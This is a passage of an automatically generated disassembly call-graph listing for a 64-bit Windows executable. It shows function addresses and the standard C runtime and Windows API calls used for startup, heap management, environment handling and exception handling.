7ff6e1b4a3f4 14793->14812 14794->14792 14800 7ff6e1b4dd81 memcpy_s 14799->14800 14801 7ff6e1b4ddd2 14800->14801 14802 7ff6e1b4ddb6 RtlAllocateHeap 14800->14802 14817 7ff6e1b526e0 14800->14817 14804 7ff6e1b44474 memcpy_s 10 API calls 14801->14804 14802->14800 14803 7ff6e1b4a8e6 14802->14803 14803->14790 14803->14791 14804->14803 14807 7ff6e1b49e4d RtlRestoreThreadPreferredUILanguages 14806->14807 14808 7ff6e1b49e7c 14806->14808 14807->14808 14809 7ff6e1b49e68 GetLastError 14807->14809 14808->14788 14810 7ff6e1b49e75 Concurrency::details::SchedulerProxy::DeleteThis 14809->14810 14811 7ff6e1b44474 memcpy_s 9 API calls 14810->14811 14811->14808 14826 7ff6e1b4a2cc 14812->14826 14820 7ff6e1b52720 14817->14820 14825 7ff6e1b4f7b8 EnterCriticalSection 14820->14825 14838 7ff6e1b4f7b8 EnterCriticalSection 14826->14838 14842 7ff6e1b4a809 FlsSetValue 14841->14842 14848 7ff6e1b4a7ec 14841->14848 14843 7ff6e1b4a81b 14842->14843 14847 7ff6e1b4a7f9 14842->14847 14845 7ff6e1b4dd70 memcpy_s 5 API calls 14843->14845 14844 7ff6e1b4a875 SetLastError 14844->14744 14846 7ff6e1b4a82a 14845->14846 14849 7ff6e1b4a848 FlsSetValue 14846->14849 14850 7ff6e1b4a838 FlsSetValue 14846->14850 14847->14844 14848->14842 14848->14847 14852 7ff6e1b4a866 14849->14852 14853 7ff6e1b4a854 FlsSetValue 14849->14853 14851 7ff6e1b4a841 14850->14851 14854 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14851->14854 14855 7ff6e1b4a3f4 memcpy_s 5 API calls 14852->14855 14853->14851 14854->14847 14856 7ff6e1b4a86e 14855->14856 14857 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14856->14857 14857->14844 14859 7ff6e1b3b07e RtlLookupFunctionEntry 14858->14859 14860 7ff6e1b3ae9b 14859->14860 14861 7ff6e1b3b094 RtlVirtualUnwind 14859->14861 14862 7ff6e1b3ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14860->14862 14861->14859 14861->14860 14864 7ff6e1b49b4e _wfindfirst32i64 memcpy_s 14863->14864 14865 7ff6e1b49b76 RtlCaptureContext RtlLookupFunctionEntry 14864->14865 14866 7ff6e1b49be6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14865->14866 14867 7ff6e1b49bb0 RtlVirtualUnwind 14865->14867 14868 7ff6e1b49c38 _wfindfirst32i64 14866->14868 14867->14866 14869 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 14868->14869 14870 7ff6e1b49c57 GetCurrentProcess TerminateProcess 14869->14870 18513 7ff6e1b59694 18516 7ff6e1b44328 LeaveCriticalSection 18513->18516 17915 7ff6e1b5950e 17916 7ff6e1b5951e 17915->17916 17919 7ff6e1b44328 LeaveCriticalSection 17916->17919 17796 7ff6e1b3a3a0 17797 7ff6e1b3a3ce 17796->17797 17798 7ff6e1b3a3b5 17796->17798 17798->17797 17800 7ff6e1b4cafc 12 API calls 17798->17800 17799 7ff6e1b3a42c 17800->17799 17924 7ff6e1b50820 17935 7ff6e1b56794 17924->17935 17937 7ff6e1b567a1 17935->17937 17936 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17936->17937 17937->17936 17938 7ff6e1b567bd 17937->17938 17939 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17938->17939 17940 7ff6e1b50829 17938->17940 17939->17938 17941 7ff6e1b4f7b8 EnterCriticalSection 17940->17941 17956 7ff6e1b59729 17957 7ff6e1b59738 17956->17957 17958 7ff6e1b59742 17956->17958 17960 7ff6e1b4f818 LeaveCriticalSection 17957->17960 18801 7ff6e1b4fa38 18802 7ff6e1b4fa5c 18801->18802 18805 7ff6e1b4fa6c 18801->18805 18803 7ff6e1b44474 memcpy_s 11 API calls 18802->18803 18823 7ff6e1b4fa61 18803->18823 18804 7ff6e1b4fd4c 18807 7ff6e1b44474 memcpy_s 11 API calls 18804->18807 18805->18804 18806 7ff6e1b4fa8e 18805->18806 18808 7ff6e1b4faaf 18806->18808 18932 7ff6e1b500f4 18806->18932 18809 7ff6e1b4fd51 18807->18809 18812 7ff6e1b4fb21 18808->18812 18814 7ff6e1b4fad5 18808->18814 18819 7ff6e1b4fb15 18808->18819 18811 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18809->18811 18811->18823 18816 7ff6e1b4dd70 memcpy_s 11 API calls 18812->18816 18830 7ff6e1b4fae4 18812->18830 18813 7ff6e1b4fbce 18822 7ff6e1b4fbeb 18813->18822 18831 7ff6e1b4fc3d 18813->18831 18947 7ff6e1b48548 18814->18947 18820 7ff6e1b4fb37 18816->18820 18818 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18818->18823 18819->18813 18819->18830 18953 7ff6e1b564dc 18819->18953 18824 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18820->18824 18827 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18822->18827 18828 7ff6e1b4fb45 18824->18828 18825 7ff6e1b4fafd 18825->18819 18833 7ff6e1b500f4 45 API calls 18825->18833 18826 7ff6e1b4fadf 18829 7ff6e1b44474 memcpy_s 11 API calls 18826->18829 18832 7ff6e1b4fbf4 18827->18832 18828->18819 18828->18830 18835 7ff6e1b4dd70 memcpy_s 11 API calls 18828->18835 18829->18830 18830->18818 18831->18830 18834 7ff6e1b5252c 40 API calls 18831->18834 18842 7ff6e1b4fbf9 18832->18842 18989 7ff6e1b5252c 18832->18989 18833->18819 18836 7ff6e1b4fc7a 18834->18836 18837 7ff6e1b4fb67 18835->18837 18838 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18836->18838 18840 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18837->18840 18841 7ff6e1b4fc84 18838->18841 18840->18819 18841->18830 18841->18842 18843 7ff6e1b4fd40 18842->18843 18847 7ff6e1b4dd70 memcpy_s 11 API calls 18842->18847 18845 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18843->18845 18844 7ff6e1b4fc25 18846 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18844->18846 18845->18823 18846->18842 18848 7ff6e1b4fcc8 18847->18848 18849 7ff6e1b4fcd9 18848->18849 18850 7ff6e1b4fcd0 18848->18850 18852 7ff6e1b491dc __std_exception_copy 37 API calls 18849->18852 18851 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18850->18851 18853 7ff6e1b4fcd7 18851->18853 18854 7ff6e1b4fce8 18852->18854 18859 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18853->18859 18855 7ff6e1b4fd7b 18854->18855 18856 7ff6e1b4fcf0 18854->18856 18858 7ff6e1b49e00 _wfindfirst32i64 17 API calls 18855->18858 18998 7ff6e1b565f4 18856->18998 18861 7ff6e1b4fd8f 18858->18861 18859->18823 18864 7ff6e1b4fdb8 18861->18864 18871 7ff6e1b4fdc8 18861->18871 18862 7ff6e1b4fd17 18867 7ff6e1b44474 memcpy_s 11 API calls 18862->18867 18863 7ff6e1b4fd38 18866 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18863->18866 18865 7ff6e1b44474 memcpy_s 11 API calls 18864->18865 18868 7ff6e1b4fdbd 18865->18868 18866->18843 18869 7ff6e1b4fd1c 18867->18869 18872 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18869->18872 18870 7ff6e1b500ab 18874 7ff6e1b44474 memcpy_s 11 API calls 18870->18874 18871->18870 18873 7ff6e1b4fdea 18871->18873 18872->18853 18875 7ff6e1b4fe07 18873->18875 19017 7ff6e1b501dc 18873->19017 18876 7ff6e1b500b0 18874->18876 18879 7ff6e1b4fe7b 18875->18879 18881 7ff6e1b4fe2f 18875->18881 18887 7ff6e1b4fe6f 18875->18887 18878 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18876->18878 18878->18868 18883 7ff6e1b4fea3 18879->18883 18888 7ff6e1b4dd70 memcpy_s 11 API calls 18879->18888 18899 7ff6e1b4fe3e 18879->18899 18880 7ff6e1b4ff2e 18892 7ff6e1b4ff4b 18880->18892 18900 7ff6e1b4ff9e 18880->18900 19032 7ff6e1b48584 18881->19032 18885 7ff6e1b4dd70 memcpy_s 11 API calls 18883->18885 18883->18887 18883->18899 18893 7ff6e1b4fec5 18885->18893 18886 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18886->18868 18887->18880 18887->18899 19038 7ff6e1b5639c 18887->19038 18894 7ff6e1b4fe95 18888->18894 18890 7ff6e1b4fe57 18890->18887 18902 7ff6e1b501dc 45 API calls 18890->18902 18891 7ff6e1b4fe39 18896 7ff6e1b44474 memcpy_s 11 API calls 18891->18896 18897 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18892->18897 18898 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18893->18898 18895 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18894->18895 18895->18883 18896->18899 18901 7ff6e1b4ff54 18897->18901 18898->18887 18899->18886 18900->18899 18903 7ff6e1b5252c 40 API calls 18900->18903 18906 7ff6e1b5252c 40 API calls 18901->18906 18908 7ff6e1b4ff5a 18901->18908 18902->18887 18904 7ff6e1b4ffdc 18903->18904 18905 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18904->18905 18907 7ff6e1b4ffe6 18905->18907 18910 7ff6e1b4ff86 18906->18910 18907->18899 18907->18908 18909 7ff6e1b5009f 18908->18909 18913 7ff6e1b4dd70 memcpy_s 11 API calls 18908->18913 18911 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18909->18911 18912 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18910->18912 18911->18868 18912->18908 18914 7ff6e1b5002b 18913->18914 18915 7ff6e1b5003c 18914->18915 18916 7ff6e1b50033 18914->18916 18918 7ff6e1b4f954 _wfindfirst32i64 37 API calls 18915->18918 18917 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18916->18917 18931 7ff6e1b5003a 18917->18931 18919 7ff6e1b5004a 18918->18919 18920 7ff6e1b50052 SetEnvironmentVariableW 18919->18920 18921 7ff6e1b500df 18919->18921 18922 7ff6e1b50076 18920->18922 18923 7ff6e1b50097 18920->18923 18924 7ff6e1b49e00 _wfindfirst32i64 17 API calls 18921->18924 18927 7ff6e1b44474 memcpy_s 11 API calls 18922->18927 18926 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18923->18926 18928 7ff6e1b500f3 18924->18928 18925 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18925->18868 18926->18909 18929 7ff6e1b5007b 18927->18929 18930 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18929->18930 18930->18931 18931->18925 18933 7ff6e1b50129 18932->18933 18940 7ff6e1b50111 18932->18940 18934 7ff6e1b4dd70 memcpy_s 11 API calls 18933->18934 18942 7ff6e1b5014d 18934->18942 18935 7ff6e1b501d2 18936 7ff6e1b4923c _CallSETranslator 45 API calls 18935->18936 18938 7ff6e1b501d8 18936->18938 18937 7ff6e1b501ae 18939 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18937->18939 18939->18940 18940->18808 18941 7ff6e1b4dd70 memcpy_s 11 API calls 18941->18942 18942->18935 18942->18937 18942->18941 18943 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18942->18943 18944 7ff6e1b491dc __std_exception_copy 37 API calls 18942->18944 18945 7ff6e1b501bd 18942->18945 18943->18942 18944->18942 18946 7ff6e1b49e00 _wfindfirst32i64 17 API calls 18945->18946 18946->18935 18948 7ff6e1b48558 18947->18948 18949 7ff6e1b48561 18947->18949 18948->18949 19062 7ff6e1b48020 18948->19062 18949->18825 18949->18826 18954 7ff6e1b5568c 18953->18954 18955 7ff6e1b564e9 18953->18955 18956 7ff6e1b55699 18954->18956 18962 7ff6e1b556cf 18954->18962 18957 7ff6e1b44a4c 45 API calls 18955->18957 18958 7ff6e1b44474 memcpy_s 11 API calls 18956->18958 18977 7ff6e1b55640 18956->18977 18960 7ff6e1b5651d 18957->18960 18961 7ff6e1b556a3 18958->18961 18959 7ff6e1b556f9 18963 7ff6e1b44474 memcpy_s 11 API calls 18959->18963 18964 7ff6e1b56522 18960->18964 18965 7ff6e1b56533 18960->18965 18970 7ff6e1b5654a 18960->18970 18966 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 18961->18966 18962->18959 18967 7ff6e1b5571e 18962->18967 18968 7ff6e1b556fe 18963->18968 18964->18819 18971 7ff6e1b44474 memcpy_s 11 API calls 18965->18971 18972 7ff6e1b556ae 18966->18972 18976 7ff6e1b44a4c 45 API calls 18967->18976 18980 7ff6e1b55709 18967->18980 18969 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 18968->18969 18969->18980 18974 7ff6e1b56566 18970->18974 18975 7ff6e1b56554 18970->18975 18973 7ff6e1b56538 18971->18973 18972->18819 18978 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 18973->18978 18981 7ff6e1b56577 18974->18981 18982 7ff6e1b5658e 18974->18982 18979 7ff6e1b44474 memcpy_s 11 API calls 18975->18979 18976->18980 18977->18819 18978->18964 18984 7ff6e1b56559 18979->18984 18980->18819 19124 7ff6e1b556dc 18981->19124 19133 7ff6e1b583b8 18982->19133 18987 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 18984->18987 18987->18964 18988 7ff6e1b44474 memcpy_s 11 API calls 18988->18964 18990 7ff6e1b5256b 18989->18990 18991 7ff6e1b5254e 18989->18991 18993 7ff6e1b52575 18990->18993 19173 7ff6e1b56fe8 18990->19173 18991->18990 18992 7ff6e1b5255c 18991->18992 18994 7ff6e1b44474 memcpy_s 11 API calls 18992->18994 19180 7ff6e1b4f9bc 18993->19180 18997 7ff6e1b52561 memcpy_s 18994->18997 18997->18844 18999 7ff6e1b44a4c 45 API calls 18998->18999 19000 7ff6e1b5665a 18999->19000 19001 7ff6e1b4dffc 5 API calls 19000->19001 19002 7ff6e1b56668 19000->19002 19001->19002 19003 7ff6e1b44534 14 API calls 19002->19003 19004 7ff6e1b566c4 19003->19004 19005 7ff6e1b56754 19004->19005 19006 7ff6e1b44a4c 45 API calls 19004->19006 19008 7ff6e1b56765 19005->19008 19009 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19005->19009 19007 7ff6e1b566d7 19006->19007 19011 7ff6e1b4dffc 5 API calls 19007->19011 19016 7ff6e1b566e0 19007->19016 19010 7ff6e1b4fd13 19008->19010 19012 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19008->19012 19009->19008 19010->18862 19010->18863 19011->19016 19012->19010 19013 7ff6e1b44534 14 API calls 19014 7ff6e1b5673b 19013->19014 19014->19005 19015 7ff6e1b56743 SetEnvironmentVariableW 19014->19015 19015->19005 19016->19013 19018 7ff6e1b5021c 19017->19018 19019 7ff6e1b501ff 19017->19019 19020 7ff6e1b4dd70 memcpy_s 11 API calls 19018->19020 19019->18875 19025 7ff6e1b50240 19020->19025 19021 7ff6e1b502a1 19024 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19021->19024 19022 7ff6e1b4923c _CallSETranslator 45 API calls 19023 7ff6e1b502ca 19022->19023 19024->19019 19025->19021 19026 7ff6e1b4dd70 memcpy_s 11 API calls 19025->19026 19027 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19025->19027 19028 7ff6e1b4f954 _wfindfirst32i64 37 API calls 19025->19028 19029 7ff6e1b502b0 19025->19029 19031 7ff6e1b502c4 19025->19031 19026->19025 19027->19025 19028->19025 19030 7ff6e1b49e00 _wfindfirst32i64 17 API calls 19029->19030 19030->19031 19031->19022 19033 7ff6e1b4859d 19032->19033 19034 7ff6e1b48594 19032->19034 19033->18890 19033->18891 19034->19033 19035 7ff6e1b48094 40 API calls 19034->19035 19036 7ff6e1b485a6 19035->19036 19036->19033 19037 7ff6e1b48454 12 API calls 19036->19037 19037->19033 19039 7ff6e1b563a9 19038->19039 19043 7ff6e1b563d6 19038->19043 19040 7ff6e1b563ae 19039->19040 19039->19043 19041 7ff6e1b44474 memcpy_s 11 API calls 19040->19041 19044 7ff6e1b563b3 19041->19044 19042 7ff6e1b5641a 19047 7ff6e1b44474 memcpy_s 11 API calls 19042->19047 19043->19042 19045 7ff6e1b56439 19043->19045 19060 7ff6e1b5640e __crtLCMapStringW 19043->19060 19046 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 19044->19046 19048 7ff6e1b56443 19045->19048 19049 7ff6e1b56455 19045->19049 19050 7ff6e1b563be 19046->19050 19051 7ff6e1b5641f 19047->19051 19052 7ff6e1b44474 memcpy_s 11 API calls 19048->19052 19053 7ff6e1b44a4c 45 API calls 19049->19053 19050->18887 19054 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 19051->19054 19055 7ff6e1b56448 19052->19055 19056 7ff6e1b56462 19053->19056 19054->19060 19057 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 19055->19057 19056->19060 19192 7ff6e1b57f74 19056->19192 19057->19060 19060->18887 19061 7ff6e1b44474 memcpy_s 11 API calls 19061->19060 19063 7ff6e1b48039 19062->19063 19064 7ff6e1b48035 19062->19064 19065 7ff6e1b51760 65 API calls 19063->19065 19064->18949 19077 7ff6e1b48374 19064->19077 19066 7ff6e1b4803e 19065->19066 19085 7ff6e1b51a9c GetEnvironmentStringsW 19066->19085 19069 7ff6e1b48057 19105 7ff6e1b48104 19069->19105 19070 7ff6e1b4804b 19072 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19070->19072 19072->19064 19074 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19075 7ff6e1b4807e 19074->19075 19076 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19075->19076 19076->19064 19078 7ff6e1b4839d 19077->19078 19079 7ff6e1b483b6 19077->19079 19078->18949 19079->19078 19080 7ff6e1b4dd70 memcpy_s 11 API calls 19079->19080 19081 7ff6e1b48446 19079->19081 19082 7ff6e1b4f0e8 WideCharToMultiByte 19079->19082 19084 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19079->19084 19080->19079 19083 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19081->19083 19082->19079 19083->19078 19084->19079 19086 7ff6e1b51acc 19085->19086 19087 7ff6e1b48043 19085->19087 19088 7ff6e1b4f0e8 WideCharToMultiByte 19086->19088 19087->19069 19087->19070 19089 7ff6e1b51b1d 19088->19089 19090 7ff6e1b51b24 FreeEnvironmentStringsW 19089->19090 19091 7ff6e1b4cafc _fread_nolock 12 API calls 19089->19091 19090->19087 19092 7ff6e1b51b37 19091->19092 19093 7ff6e1b51b48 19092->19093 19094 7ff6e1b51b3f 19092->19094 19096 7ff6e1b4f0e8 WideCharToMultiByte 19093->19096 19095 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19094->19095 19097 7ff6e1b51b46 19095->19097 19098 7ff6e1b51b6b 19096->19098 19097->19090 19099 7ff6e1b51b79 19098->19099 19100 7ff6e1b51b6f 19098->19100 19102 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19099->19102 19101 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19100->19101 19103 7ff6e1b51b77 FreeEnvironmentStringsW 19101->19103 19102->19103 19103->19087 19106 7ff6e1b48129 19105->19106 19107 7ff6e1b4dd70 memcpy_s 11 API calls 19106->19107 19119 7ff6e1b4815f 19107->19119 19108 7ff6e1b48167 19109 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19108->19109 19111 7ff6e1b4805f 19109->19111 19110 7ff6e1b481da 19112 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19110->19112 19111->19074 19112->19111 19113 7ff6e1b4dd70 memcpy_s 11 API calls 19113->19119 19114 7ff6e1b481c9 19116 7ff6e1b48330 11 API calls 19114->19116 19115 7ff6e1b491dc __std_exception_copy 37 API calls 19115->19119 19117 7ff6e1b481d1 19116->19117 19118 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19117->19118 19118->19108 19119->19108 19119->19110 19119->19113 19119->19114 19119->19115 19120 7ff6e1b481ff 19119->19120 19122 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19119->19122 19121 7ff6e1b49e00 _wfindfirst32i64 17 API calls 19120->19121 19123 7ff6e1b48212 19121->19123 19122->19119 19125 7ff6e1b556f9 19124->19125 19126 7ff6e1b55710 19124->19126 19127 7ff6e1b44474 memcpy_s 11 API calls 19125->19127 19126->19125 19128 7ff6e1b5571e 19126->19128 19129 7ff6e1b556fe 19127->19129 19131 7ff6e1b44a4c 45 API calls 19128->19131 19132 7ff6e1b55709 19128->19132 19130 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 19129->19130 19130->19132 19131->19132 19132->18964 19134 7ff6e1b44a4c 45 API calls 19133->19134 19135 7ff6e1b583dd 19134->19135 19138 7ff6e1b58034 19135->19138 19140 7ff6e1b58082 19138->19140 19139 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 19141 7ff6e1b565b5 19139->19141 19142 7ff6e1b58109 19140->19142 19144 7ff6e1b580f4 GetCPInfo 19140->19144 19147 7ff6e1b5810d 19140->19147 19141->18964 19141->18988 19143 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 19142->19143 19142->19147 19145 7ff6e1b581a1 19143->19145 19144->19142 19144->19147 19146 7ff6e1b4cafc _fread_nolock 12 API calls 19145->19146 19145->19147 19148 7ff6e1b581d8 19145->19148 19146->19148 19147->19139 19148->19147 19149 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 19148->19149 19150 7ff6e1b58246 19149->19150 19151 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 19150->19151 19160 7ff6e1b58328 19150->19160 19153 7ff6e1b5826c 19151->19153 19152 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19152->19147 19154 7ff6e1b4cafc _fread_nolock 12 API calls 19153->19154 19155 7ff6e1b58299 19153->19155 19153->19160 19154->19155 19156 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 19155->19156 19155->19160 19157 7ff6e1b58310 19156->19157 19158 7ff6e1b58316 19157->19158 19159 7ff6e1b58330 19157->19159 19158->19160 19162 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19158->19162 19167 7ff6e1b4e040 19159->19167 19160->19147 19160->19152 19162->19160 19164 7ff6e1b5836f 19164->19147 19166 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19164->19166 19165 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19165->19164 19166->19147 19168 7ff6e1b4dde8 __crtLCMapStringW 5 API calls 19167->19168 19169 7ff6e1b4e07e 19168->19169 19170 7ff6e1b4e2a8 __crtLCMapStringW 5 API calls 19169->19170 19172 7ff6e1b4e086 19169->19172 19171 7ff6e1b4e0ef CompareStringW 19170->19171 19171->19172 19172->19164 19172->19165 19174 7ff6e1b5700a HeapSize 19173->19174 19175 7ff6e1b56ff1 19173->19175 19176 7ff6e1b44474 memcpy_s 11 API calls 19175->19176 19177 7ff6e1b56ff6 19176->19177 19178 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 19177->19178 19179 7ff6e1b57001 19178->19179 19179->18993 19181 7ff6e1b4f9db 19180->19181 19182 7ff6e1b4f9d1 19180->19182 19184 7ff6e1b4f9e0 19181->19184 19190 7ff6e1b4f9e7 memcpy_s 19181->19190 19183 7ff6e1b4cafc _fread_nolock 12 API calls 19182->19183 19188 7ff6e1b4f9d9 19183->19188 19185 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19184->19185 19185->19188 19186 7ff6e1b4fa1a HeapReAlloc 19186->19188 19186->19190 19187 7ff6e1b4f9ed 19189 7ff6e1b44474 memcpy_s 11 API calls 19187->19189 19188->18997 19189->19188 19190->19186 19190->19187 19191 7ff6e1b526e0 memcpy_s 2 API calls 19190->19191 19191->19190 19193 7ff6e1b57f9d __crtLCMapStringW 19192->19193 19194 7ff6e1b5649e 19193->19194 19195 7ff6e1b4e040 6 API calls 19193->19195 19194->19060 19194->19061 19195->19194 17968 7ff6e1b442c0 17969 7ff6e1b442cb 17968->17969 17977 7ff6e1b4e384 17969->17977 17990 7ff6e1b4f7b8 EnterCriticalSection 17977->17990 14871 7ff6e1b3b1cc 14894 7ff6e1b3b39c 14871->14894 14874 7ff6e1b3b318 15000 7ff6e1b3b6cc IsProcessorFeaturePresent 14874->15000 14875 7ff6e1b3b1e8 __scrt_acquire_startup_lock 14877 7ff6e1b3b322 14875->14877 14878 7ff6e1b3b206 14875->14878 14879 7ff6e1b3b6cc 7 API calls 14877->14879 14884 7ff6e1b3b227 __scrt_release_startup_lock 14878->14884 14902 7ff6e1b486a4 14878->14902 14882 7ff6e1b3b32d _CallSETranslator 14879->14882 14881 7ff6e1b3b22b 14883 7ff6e1b3b2b1 14906 7ff6e1b3b818 14883->14906 14884->14881 14884->14883 14989 7ff6e1b489b4 14884->14989 14886 7ff6e1b3b2b6 14909 7ff6e1b31000 14886->14909 14891 7ff6e1b3b2d9 14891->14882 14996 7ff6e1b3b530 14891->14996 15007 7ff6e1b3b99c 14894->15007 14897 7ff6e1b3b1e0 14897->14874 14897->14875 14898 7ff6e1b3b3cb 15009 7ff6e1b490bc 14898->15009 14903 7ff6e1b486b7 14902->14903 14904 7ff6e1b486de 14903->14904 15052 7ff6e1b3b0e0 14903->15052 14904->14884 15130 7ff6e1b3c240 14906->15130 14908 7ff6e1b3b82f GetStartupInfoW 14908->14886 14910 7ff6e1b3100b 14909->14910 15132 7ff6e1b37630 14910->15132 14912 7ff6e1b3101d 15139 7ff6e1b44f44 14912->15139 14914 7ff6e1b3369b 15146 7ff6e1b31af0 14914->15146 14918 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 14919 7ff6e1b337ce 14918->14919 14994 7ff6e1b3b85c GetModuleHandleW 14919->14994 14920 7ff6e1b336b9 14981 7ff6e1b337ba 14920->14981 15162 7ff6e1b33b40 14920->15162 14922 7ff6e1b336eb 14922->14981 15165 7ff6e1b369b0 14922->15165 14924 7ff6e1b33707 14925 7ff6e1b33753 14924->14925 14927 7ff6e1b369b0 61 API calls 14924->14927 15180 7ff6e1b36fc0 14925->15180 14932 7ff6e1b33728 __std_exception_destroy 14927->14932 14928 7ff6e1b33768 15184 7ff6e1b319d0 14928->15184 14931 7ff6e1b3385d 14934 7ff6e1b33888 14931->14934 15275 7ff6e1b332a0 14931->15275 14932->14925 14937 7ff6e1b36fc0 58 API calls 14932->14937 14933 7ff6e1b319d0 121 API calls 14936 7ff6e1b3379e 14933->14936 14942 7ff6e1b338cb 14934->14942 15279 7ff6e1b37a60 14934->15279 14940 7ff6e1b337e0 14936->14940 14941 7ff6e1b337a2 14936->14941 14937->14925 14939 7ff6e1b338a8 14943 7ff6e1b338ad 14939->14943 14944 7ff6e1b338be SetDllDirectoryW 14939->14944 14940->14931 15252 7ff6e1b33cd0 14940->15252 15239 7ff6e1b32770 14941->15239 15195 7ff6e1b35e60 14942->15195 14946 7ff6e1b32770 59 API calls 14943->14946 14944->14942 14946->14981 14951 7ff6e1b33802 14955 7ff6e1b32770 59 API calls 14951->14955 14954 7ff6e1b33830 14954->14931 14957 7ff6e1b33835 14954->14957 14955->14981 14956 7ff6e1b338e8 14978 7ff6e1b3391a 14956->14978 15303 7ff6e1b35660 14956->15303 15271 7ff6e1b3f2dc 14957->15271 14958 7ff6e1b339e6 15199 7ff6e1b33130 14958->15199 14964 7ff6e1b33939 14970 7ff6e1b33985 14964->14970 15345 7ff6e1b31b30 14964->15345 14965 7ff6e1b3391c 15339 7ff6e1b358b0 14965->15339 14970->14981 15349 7ff6e1b330d0 14970->15349 14972 7ff6e1b33a1b 14974 7ff6e1b369b0 61 API calls 14972->14974 14973 7ff6e1b3390b 15333 7ff6e1b35cb0 14973->15333 14979 7ff6e1b33a27 14974->14979 14977 7ff6e1b339c1 14980 7ff6e1b358b0 FreeLibrary 14977->14980 14978->14958 14978->14964 14979->14981 15216 7ff6e1b37000 14979->15216 14980->14981 14981->14918 14990 7ff6e1b489cb 14989->14990 14991 7ff6e1b489ec 14989->14991 14990->14883 17791 7ff6e1b49108 14991->17791 14995 7ff6e1b3b86d 14994->14995 14995->14891 14998 7ff6e1b3b541 14996->14998 14997 7ff6e1b3b2f0 14997->14881 14998->14997 14999 7ff6e1b3caf8 __scrt_initialize_crt 7 API calls 14998->14999 14999->14997 15001 7ff6e1b3b6f2 _wfindfirst32i64 memcpy_s 15000->15001 15002 